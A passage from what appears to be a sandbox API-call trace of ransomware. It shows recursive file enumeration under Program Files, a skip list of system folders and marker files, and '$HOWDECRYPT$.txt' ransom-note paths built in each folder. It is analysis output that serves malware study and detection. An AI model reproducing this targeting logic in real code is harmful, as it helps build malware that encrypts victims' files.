lpFindFileData=0x298eff8) returned 1 [0091.915] lstrcmpiW (lpString1="msdarem.dll", lpString2="Windows") returned -1 [0091.915] lstrlenW (lpString="Windows") returned 7 [0091.915] lstrcmpiW (lpString1="msdarem.dll", lpString2="$Recycle.bin") returned 1 [0091.915] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.915] lstrcmpiW (lpString1="msdarem.dll", lpString2="System Volume Information") returned -1 [0091.915] lstrlenW (lpString="System Volume Information") returned 25 [0091.915] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 58 [0091.915] StrStrIW (lpFirst="msdarem.dll", lpSrch=".spyhunter") returned 0x0 [0091.915] lstrcmpW (lpString1="msdarem.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.915] lstrcmpW (lpString1="msdarem.dll", lpString2="_uninstalling_.png") returned 1 [0091.915] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 58 [0091.915] GetProcessHeap () returned 0x2c0000 [0091.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34d118 [0091.915] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0091.915] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.915] lstrcmpiW (lpString1="msdaremr.dll", lpString2="Windows") returned -1 [0091.915] lstrlenW (lpString="Windows") returned 7 [0091.915] lstrcmpiW (lpString1="msdaremr.dll", lpString2="$Recycle.bin") returned 1 [0091.916] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.916] lstrcmpiW (lpString1="msdaremr.dll", lpString2="System Volume Information") returned -1 [0091.916] lstrlenW (lpString="System Volume Information") returned 25 [0091.916] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 59 [0091.916] StrStrIW (lpFirst="msdaremr.dll", lpSrch=".spyhunter") returned 0x0 [0091.916] lstrcmpW (lpString1="msdaremr.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.916] lstrcmpW (lpString1="msdaremr.dll", lpString2="_uninstalling_.png") returned 1 [0091.916] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 59 [0091.916] GetProcessHeap () returned 0x2c0000 [0091.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34d1d8 [0091.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0091.916] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.916] lstrcmpiW (lpString1="msdfmap.dll", lpString2="Windows") returned -1 [0091.916] lstrlenW (lpString="Windows") returned 7 [0091.916] lstrcmpiW (lpString1="msdfmap.dll", lpString2="$Recycle.bin") returned 1 [0091.916] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.916] lstrcmpiW (lpString1="msdfmap.dll", lpString2="System Volume Information") returned -1 [0091.916] lstrlenW (lpString="System Volume Information") returned 25 [0091.916] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 58 [0091.916] StrStrIW (lpFirst="msdfmap.dll", lpSrch=".spyhunter") returned 0x0 [0091.916] lstrcmpW (lpString1="msdfmap.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.917] lstrcmpW (lpString1="msdfmap.dll", lpString2="_uninstalling_.png") returned 1 [0091.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 58 [0091.917] GetProcessHeap () returned 0x2c0000 [0091.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34d418 [0091.917] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1630) returned 0x2c310e0 [0091.917] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.917] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.917] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\$HOWDECRYPT$.txt") returned 63 [0091.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\$HOWDECRYPT$.txt") returned 63 [0091.917] GetProcessHeap () returned 0x2c0000 [0091.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc0) returned 0x32d748 [0091.917] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1638) returned 0x2c310e0 [0091.918] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.918] lstrcmpiW (lpString1="MSMAPI", lpString2="Windows") returned -1 [0091.918] lstrlenW (lpString="Windows") returned 7 [0091.919] lstrcmpiW (lpString1="MSMAPI", lpString2="$Recycle.bin") returned 1 [0091.919] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.919] lstrcmpiW (lpString1="MSMAPI", lpString2="System Volume Information") returned -1 [0091.919] lstrlenW (lpString="System Volume Information") returned 25 [0091.919] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI") returned 47 [0091.919] lstrcmpW (lpString1="MSMAPI", lpString2=".") returned 1 [0091.919] lstrcmpW (lpString1="MSMAPI", lpString2="..") returned 1 [0091.919] GetProcessHeap () returned 0x2c0000 [0091.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0091.919] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*") returned 49 [0091.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.949] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.949] lstrlenW (lpString="Windows") returned 7 [0091.949] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.949] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.949] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.949] lstrlenW (lpString="System Volume Information") returned 25 [0091.949] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\.") returned 49 [0091.949] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.949] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.949] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.949] lstrlenW (lpString="Windows") returned 7 [0091.949] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.950] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.950] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.950] lstrlenW (lpString="System Volume Information") returned 25 [0091.950] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\..") returned 50 [0091.950] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.950] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.950] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0091.950] lstrlenW (lpString="Windows") returned 7 [0091.950] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0091.950] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.950] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0091.950] lstrlenW (lpString="System Volume Information") returned 25 [0091.950] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033") returned 52 [0091.950] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0091.950] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0091.950] GetProcessHeap () returned 0x2c0000 [0091.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.951] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*") returned 54 [0091.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.951] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.951] lstrlenW (lpString="Windows") returned 7 [0091.952] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.952] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.952] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.952] lstrlenW (lpString="System Volume Information") returned 25 [0091.952] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\.") returned 54 [0091.952] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.952] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.952] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.952] lstrlenW (lpString="Windows") returned 7 [0091.952] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.952] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.952] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.952] lstrlenW (lpString="System Volume Information") returned 25 [0091.952] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\..") returned 55 [0091.952] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.952] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.952] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.952] lstrcmpiW (lpString1="MSMAPI32.DLL", lpString2="Windows") returned -1 [0091.952] lstrlenW (lpString="Windows") returned 7 [0091.952] lstrcmpiW (lpString1="MSMAPI32.DLL", lpString2="$Recycle.bin") returned 1 [0091.952] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.952] lstrcmpiW (lpString1="MSMAPI32.DLL", lpString2="System Volume Information") returned -1 [0091.952] lstrlenW (lpString="System Volume Information") returned 25 [0091.952] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned 65 [0091.952] StrStrIW (lpFirst="MSMAPI32.DLL", lpSrch=".spyhunter") returned 0x0 [0091.952] lstrcmpW (lpString1="MSMAPI32.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.953] lstrcmpW (lpString1="MSMAPI32.DLL", lpString2="_uninstalling_.png") returned 1 [0091.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned 65 [0091.953] GetProcessHeap () returned 0x2c0000 [0091.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358610 [0091.953] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0091.953] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.953] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.953] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\$HOWDECRYPT$.txt") returned 69 [0091.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\$HOWDECRYPT$.txt") returned 69 [0091.953] GetProcessHeap () returned 0x2c0000 [0091.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e3b0 [0091.953] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0091.953] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.953] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.953] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\$HOWDECRYPT$.txt") returned 64 [0091.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\$HOWDECRYPT$.txt") returned 64 [0091.953] GetProcessHeap () returned 0x2c0000 [0091.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x358d60 [0091.954] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0091.954] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.954] lstrcmpiW (lpString1="Ole DB", lpString2="Windows") returned -1 [0091.955] lstrlenW (lpString="Windows") returned 7 [0091.955] lstrcmpiW (lpString1="Ole DB", lpString2="$Recycle.bin") returned 1 [0091.955] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.955] lstrcmpiW (lpString1="Ole DB", lpString2="System Volume Information") returned -1 [0091.955] lstrlenW (lpString="System Volume Information") returned 25 [0091.955] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned 47 [0091.955] lstrcmpW (lpString1="Ole DB", lpString2=".") returned 1 [0091.955] lstrcmpW (lpString1="Ole DB", lpString2="..") returned 1 [0091.955] GetProcessHeap () returned 0x2c0000 [0091.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0091.956] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*") returned 49 [0091.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.958] lstrlenW (lpString="Windows") returned 7 [0091.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.958] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.958] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.958] lstrlenW (lpString="System Volume Information") returned 25 [0091.958] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.") returned 49 [0091.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.958] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.958] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.958] lstrlenW (lpString="Windows") returned 7 [0091.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.958] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.958] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.958] lstrlenW (lpString="System Volume Information") returned 25 [0091.958] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\..") returned 50 [0091.958] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.958] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.958] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.958] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0091.958] lstrlenW (lpString="Windows") returned 7 [0091.959] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0091.959] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.959] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0091.959] lstrlenW (lpString="System Volume Information") returned 25 [0091.959] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 53 [0091.959] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0091.959] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0091.959] GetProcessHeap () returned 0x2c0000 [0091.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.978] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*") returned 55 [0091.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.979] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.979] lstrlenW (lpString="Windows") returned 7 [0091.979] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.979] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.979] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.979] lstrlenW (lpString="System Volume Information") returned 25 [0091.979] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.") returned 55 [0091.979] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.979] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.979] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.979] lstrlenW (lpString="Windows") returned 7 [0091.979] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.979] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.979] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.979] lstrlenW (lpString="System Volume Information") returned 25 [0091.979] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\..") returned 56 [0091.979] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.979] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.979] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.979] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="Windows") returned -1 [0091.979] lstrlenW (lpString="Windows") returned 7 [0091.979] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.980] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.980] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="System Volume Information") returned -1 [0091.980] lstrlenW (lpString="System Volume Information") returned 25 [0091.980] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 70 [0091.980] StrStrIW (lpFirst="msdasqlr.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.980] lstrcmpW (lpString1="msdasqlr.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.980] lstrcmpW (lpString1="msdasqlr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.980] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 70 [0091.980] GetProcessHeap () returned 0x2c0000 [0091.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e488 [0091.980] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0091.980] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.980] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="Windows") returned -1 [0091.980] lstrlenW (lpString="Windows") returned 7 [0091.980] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.980] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.980] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="System Volume Information") returned -1 [0091.980] lstrlenW (lpString="System Volume Information") returned 25 [0091.980] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 70 [0091.980] StrStrIW (lpFirst="oledb32r.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.980] lstrcmpW (lpString1="oledb32r.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.980] lstrcmpW (lpString1="oledb32r.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.980] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 70 [0091.980] GetProcessHeap () returned 0x2c0000 [0091.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e560 [0091.981] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0091.981] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.981] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="Windows") returned -1 [0091.981] lstrlenW (lpString="Windows") returned 7 [0092.033] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="$Recycle.bin") returned 1 [0092.033] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.033] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="System Volume Information") returned -1 [0092.034] lstrlenW (lpString="System Volume Information") returned 25 [0092.034] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 70 [0092.034] StrStrIW (lpFirst="sqloledb.rll.mui", lpSrch=".spyhunter") returned 0x0 [0092.034] lstrcmpW (lpString1="sqloledb.rll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.034] lstrcmpW (lpString1="sqloledb.rll.mui", lpString2="_uninstalling_.png") returned 1 [0092.034] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 70 [0092.034] GetProcessHeap () returned 0x2c0000 [0092.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e638 [0092.034] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.034] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.034] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="Windows") returned -1 [0092.034] lstrlenW (lpString="Windows") returned 7 [0092.034] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="$Recycle.bin") returned 1 [0092.034] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.034] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="System Volume Information") returned -1 [0092.034] lstrlenW (lpString="System Volume Information") returned 25 [0092.034] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 69 [0092.034] StrStrIW (lpFirst="sqlxmlx.rll.mui", lpSrch=".spyhunter") returned 0x0 [0092.034] lstrcmpW (lpString1="sqlxmlx.rll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.034] lstrcmpW (lpString1="sqlxmlx.rll.mui", lpString2="_uninstalling_.png") returned 1 [0092.034] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 69 [0092.034] GetProcessHeap () returned 0x2c0000 [0092.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e710 [0092.035] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.035] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.035] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.075] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\$HOWDECRYPT$.txt") returned 70 [0092.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\$HOWDECRYPT$.txt") returned 70 [0092.075] GetProcessHeap () returned 0x2c0000 [0092.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e3b0 [0092.075] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.075] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.075] lstrcmpiW (lpString1="msdaosp.dll", lpString2="Windows") returned -1 [0092.075] lstrlenW (lpString="Windows") returned 7 [0092.075] lstrcmpiW (lpString1="msdaosp.dll", lpString2="$Recycle.bin") returned 1 [0092.075] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.075] lstrcmpiW (lpString1="msdaosp.dll", lpString2="System Volume Information") returned -1 [0092.075] lstrlenW (lpString="System Volume Information") returned 25 [0092.075] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 59 [0092.075] StrStrIW (lpFirst="msdaosp.dll", lpSrch=".spyhunter") returned 0x0 [0092.075] lstrcmpW (lpString1="msdaosp.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.075] lstrcmpW (lpString1="msdaosp.dll", lpString2="_uninstalling_.png") returned 1 [0092.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 59 [0092.076] GetProcessHeap () returned 0x2c0000 [0092.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34d058 [0092.076] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.076] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.076] lstrcmpiW (lpString1="msdaps.dll", lpString2="Windows") returned -1 [0092.076] lstrlenW (lpString="Windows") returned 7 [0092.076] lstrcmpiW (lpString1="msdaps.dll", lpString2="$Recycle.bin") returned 1 [0092.076] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.076] lstrcmpiW (lpString1="msdaps.dll", lpString2="System Volume Information") returned -1 [0092.076] lstrlenW (lpString="System Volume 